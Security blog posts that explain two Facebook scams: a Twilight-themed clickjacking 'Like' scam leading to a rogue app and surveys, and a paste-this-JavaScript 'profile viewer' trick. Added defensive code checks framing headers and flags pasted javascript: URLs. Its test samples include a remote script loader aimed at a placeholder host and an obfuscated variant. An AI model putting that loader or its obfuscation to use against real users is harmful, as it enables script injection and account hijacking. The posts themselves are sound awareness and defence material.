The Twilight Breaking Dawn Facebook scam

Facebook users are finding themselves tagged in their online friends’ photo albums, in an attack seemingly targeted at fans of the “Twilight” teen vampire romance movies.

Following an attack against photo albums using an image of a Playboy-style bunny girl, scammers are now pretending to link to a game promoting the upcoming movie “Twilight Breaking Dawn”, starring heartthrobs Robert Pattinson and Kristen Stewart as the star-crossed lovers Edward Cullen and Bella Swan.

As well as Facebook photo albums, users are also being tricked into “Liking” the scam links.

Twilight Breaking Dawn message

Play Twilight: Breaking Dawn
Be the first of your friends to play the awesome new Twilight game on Facebook!

If you click on such a link then you will be taken to a Facebook page which to all intents and purposes appears to be promoting an online game, being used to market Twilight Breaking Dawn.

Twilight Breaking Dawn on Facebook

But if you click on the button marked “Play Now” then you will be clickjacked into saying you “Like” the link, thus spreading the link virally to your Facebook friends.

If you’re running a protection against clickjacking, such as Firefox add-on NoScript, then you will be warned – but most people are probably unaware that the page has secretly claimed that they like the game, even though no game has yet been played!

NoScript warning of clickjacking
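The “Play Now” trick works because the page quietly loads a Facebook Like button inside a transparent frame and positions it under the button you think you are clicking. The defence a site owner has against being framed like this is to send the right response headers. The helper below is an added example, not code from this post or from Facebook, that judges a set of response headers the way a browser would; the sample header sets are constructed for illustration.

```javascript
// Added example, not code from the post: decide whether an HTTP response's
// headers stop the page being loaded inside another site's <iframe>, which is
// the server-side defence against a "Play Now" overlay like the one above.
// Sample header sets below are constructed for illustration.

function parseFrameAncestors(cspValue) {
  // CSP directives are ';'-separated; the first token of each is its name.
  for (const directive of cspValue.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0] && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.replace(/^'|'$/g, '').toLowerCase());
    }
  }
  return null; // directive absent
}

function assessFraming(headers) {
  // Header names are case-insensitive, so normalise them first.
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;

  const reasons = [];
  let byCsp = false;
  let byXfo = false;

  const csp = h['content-security-policy'];
  if (csp) {
    const sources = parseFrameAncestors(csp);
    if (sources === null) {
      reasons.push('CSP present but has no frame-ancestors directive');
    } else if (sources.includes('*')) {
      reasons.push("frame-ancestors allows any origin ('*')");
    } else {
      byCsp = true;
      reasons.push(`frame-ancestors limits framing to: ${sources.join(' ')}`);
    }
  }

  const xfo = h['x-frame-options'];
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === 'DENY' || value === 'SAMEORIGIN') {
      byXfo = true;
      reasons.push(`X-Frame-Options: ${value}`);
    } else {
      // ALLOW-FROM is obsolete and anything else is invalid; browsers ignore both.
      reasons.push(`X-Frame-Options value "${xfo}" is not enforced by modern browsers`);
    }
  }

  if (!csp && !xfo) reasons.push('no framing-protection header at all');
  // When both headers are present, browsers that support CSP use frame-ancestors
  // and ignore X-Frame-Options; either one alone is enough to block the overlay.
  return { protected: byCsp || byXfo, reasons };
}

// Constructed sample responses.
const SAMPLE_HEADERS = {
  unprotected: { 'Content-Type': 'text/html' },
  xfoOnly: { 'Content-Type': 'text/html', 'X-Frame-Options': 'SAMEORIGIN' },
  cspStrict: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  cspOpen: { 'Content-Security-Policy': 'frame-ancestors *' },
  xfoObsolete: { 'X-Frame-Options': 'ALLOW-FROM https://example.invalid' },
};

for (const [label, headers] of Object.entries(SAMPLE_HEADERS)) {
  const verdict = assessFraming(headers);
  console.log(`${label}: ${verdict.protected ? 'protected' : 'NOT protected'} (${verdict.reasons.join('; ')})`);
}
```

The caveat is that these headers only help for pages that should never be framed. A Like button is designed to be embedded in other sites, so Facebook cannot send them for it; that is why the overlay works, and why a client-side warning of the kind NoScript gives is the user’s only signal that something is wrong.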

The scam doesn’t end there, however, as that would simply spread the link without earning any money for the ne’er-do-wells behind it.

Users are then presented with a dialog, asking them to grant permission for a third party application to access their Facebook account, and post messages, updates and photos to their wall.

Rogue app requests permission

Of course, if you’re a fan of “Twilight” you will quite possibly grant permission without thinking. The only problem is that this isn’t a legitimate application request: it is being made by a rogue app which wants to make money out of your devotion to Stephenie Meyer’s series of novels.

Predictably, now that they have the ability to post to your Facebook account, the scammers present the final piece of the jigsaw: an online survey which earns them affiliate commission for each person who completes the questionnaire.

Survey scam

You will note that the survey deliberately presents itself in a convincing Facebook style, which may trick some users into believing that it is legitimate.

It seems that fans of Twilight are easy pickings for Facebook scammers, judging by the large number of reports we are seeing today from affected Facebook users.

If you’ve been affected by this scam, you should clean up your account before any further damage is done.

I’ve made a YouTube video where I show you how to clean up your Facebook account if you were hit by this or similar scams on Facebook:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you stay informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos Facebook page, where more than 70,000 people regularly share information on threats and discuss the latest security news.

You could also do a lot worse than check out our best practices for better privacy and security on Facebook guide.

Hat tip: Thanks to Naked Security reader Drew who was the first (of many!) to tell us about this scam.

Facebook scam with a difference – Social Tagging Worldwide avoids rogue apps

Vigilant Naked Security reader Mike Greer, of Cedar Park, Texas, has brought the latest Facebook “profile viewer” scam to our attention.

We write regularly about this sort of scam, which is common on Facebook, on Twitter, and even on both at the same time.

One of the reasons people fall for these scams is that they promise to provide what sounds like useful data – a list of the people who are most interested in your activities. In particular, most of the scams imply that anyone who is stalking you is likely to end up at the top of the list of people who check your profile.

(Of course, the people at the top of the list might equally well be your closest and most trusted friends. But profile view scams sell better on fear than on comfort.)

Most scams of this sort persuade you to install a rogue Facebook application and give it permission to access your account. But this latest scam, centred around a Facebook community called Social Tagging Worldwide, takes a different approach.

The Social Tagging Worldwide page is much more direct. It tries to trick you into pasting JavaScript directly in your browser and running it. Naturally, this bypasses any checks which Facebook might apply to the script if it were served up from, or wrapped inside, a web page sourced from Facebook itself.

Claiming to be “The Official Profile Viewer Application”, the page offers you a link which brings up a Facebook dialog asking you to “complete a 5 second security check to confirm you’re a Facebook user”:

The instructions sound pretty simple, and – unlike many other Facebook scams – don’t involve asking you to take a survey as proof that you aren’t a computer. The instructions may vary depending on your browser, but will look something like this:

The trick is that you aren’t cutting-and-pasting any sort of unique ID into your browser’s address bar. You’re actually pasting a piece of JavaScript and asking your browser to run it for you:

This script fetches another script – one intended to run inside pages presented by Facebook. Indeed, if you paste the offending “unique ID script” into your browser’s address bar whilst you’re on a site other than Facebook – e.g. Naked Security – you’ll see a warning that the script needs to come from Facebook itself:

But if your browser is on the original Social Tagging Worldwide community page – which is hosted by Facebook.com – and you are logged into Facebook, the pasted script runs as if it were hosted on facebook.com. Your browser thinks – indeed, effectively knows – that you’re on Facebook, because that’s the domain of the URL you are currently visiting.

The offending script in this case is designed to invite all your friends to join a specific Facebook group. No need for a rogue application.

The moral of this story is simple: BE CAREFUL WHAT YOU PASTE INTO YOUR ADDRESS BAR.

When you explicitly enter a piece of JavaScript, you’re effectively authorising your browser to run that script in the context of the site you’ve just visited. You are effectively bypassing any sort of cross-site scripting protection which either the remote site – in this case, Facebook – or your browser might have in place.

Cross-site scripting is where you trick your browser into running a script from site Y as if it were officially from site X. Pasting a script into the browser side-steps any cross-site scripting protection because there isn’t really any “cross-site” behaviour – you’re manually injecting a script into site X and thus authorising it to run yourself.
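To make the difference between a “unique ID” and a pasted script concrete, here is an added example (not code from this post, and not anything the scam page serves) that classifies text a user is about to put in the address bar. It normalises the input the way browsers do before recognising a URL scheme, so the usual tricks of leading whitespace, mixed case, embedded tabs and percent-encoding don’t hide the javascript: scheme, and it reports what the script body does. The sample inputs are constructed, and the host example.invalid is a placeholder.

```javascript
// Added example, not code from the post: classify text that a "security check"
// page asks you to paste into the address bar. A real unique ID is inert; a
// javascript: URL is executed in the origin of the page you are on, which is
// exactly how the Social Tagging Worldwide trick works. Samples are constructed.

function normalisePaste(text) {
  // Browsers drop leading whitespace/control characters and embedded tab,
  // newline and carriage-return characters before recognising a URL scheme,
  // so the detector must do the same or "java\tscript:" would slip past it.
  return text.replace(/^[\s\u0000-\u001f]+/, '').replace(/[\t\n\r]/g, '');
}

function classifyPaste(text) {
  const cleaned = normalisePaste(text);
  const schemeMatch = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  const scheme = schemeMatch ? schemeMatch[1].toLowerCase() : null;
  const findings = [];

  if (scheme === 'javascript') {
    findings.push('javascript: scheme, so the browser runs it as script in the current page');
    // The body of a javascript: URL is percent-decoded before it runs.
    let body = cleaned.slice(schemeMatch[0].length);
    try { body = decodeURIComponent(body); } catch (e) { /* leave malformed encoding as-is */ }

    // Creating a <script> element, or assigning any element's src, pulls in
    // more code or a tracking resource from elsewhere.
    if (/createElement\s*\(\s*['"]script['"]\s*\)/i.test(body) || /\.src\s*=/.test(body)) {
      findings.push('loads another script or resource from elsewhere');
    }
    if (/\b(eval|Function)\s*\(/.test(body)) {
      findings.push('evaluates dynamically built code');
    }
    if (/document\.cookie|localStorage|sessionStorage/.test(body)) {
      findings.push('touches browser storage for the current site');
    }
  }

  return { executable: scheme === 'javascript', scheme, findings };
}

// Constructed samples: an opaque identifier, an ordinary URL, a plain script
// loader, and the same loader disguised with case, whitespace and %-encoding.
const SAMPLE_PASTES = {
  genuineId: '7f3a9c1e-5b2d-4e8f-a6c0-9d1b3e5f7a2c',
  ordinaryUrl: 'https://www.facebook.com/',
  scriptLoader: "javascript:var s=document.createElement('script');s.src='https://example.invalid/v.js';document.body.appendChild(s);void 0",
  obfuscated: "\n  JAVA\tSCRIPT:%76ar s=document.createElement('script');s.src='https://example.invalid/v.js';document.body.appendChild(s)",
};

for (const [label, text] of Object.entries(SAMPLE_PASTES)) {
  const r = classifyPaste(text);
  console.log(`${label}: ${r.executable ? 'EXECUTABLE' : 'inert'}${r.findings.length ? ' - ' + r.findings.join('; ') : ''}`);
}
```

The point of the normalisation step is that a check which only looks for the literal string “javascript:” at the start of the text would pass the disguised sample; the browser, on the other hand, happily runs it. Modern browsers now strip the javascript: prefix from text pasted into the address bar for exactly this reason, but pasting into the developer console has no such protection.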

Incidentally, if you do go through with the instructions in this scam, things proceed rather predictably.

You’re asked to perform another “proof that you are human” test, and this time – I’m sure you’ve guessed already – you need to take a survey. The survey offers a prize – I’m sure you’ve guessed already – of an iPad or an iPhone:

And to win the prize – I’m sure you’ve guessed already – there’s a cost. The advance fee you’ll pay to enter the “competition” depends on your location.

I’m in Singapore right now, where I was expected to send a pricy SMS and agree to accept SMS marketing:

By the way, there’s a simple, non-technical, rule which will protect you from almost all scams of this sort:

IF IT SOUNDS TOO GOOD TO BE TRUE, IT IS TOO GOOD TO BE TRUE!

Make sure that you stay informed about the latest online scams. Join the Sophos Facebook page, where more than 70,000 people regularly share information on threats and discuss the latest security news.

While you’re about it, why not check out our Facebook security best practice guide? Learn how to protect your privacy and identity on Facebook.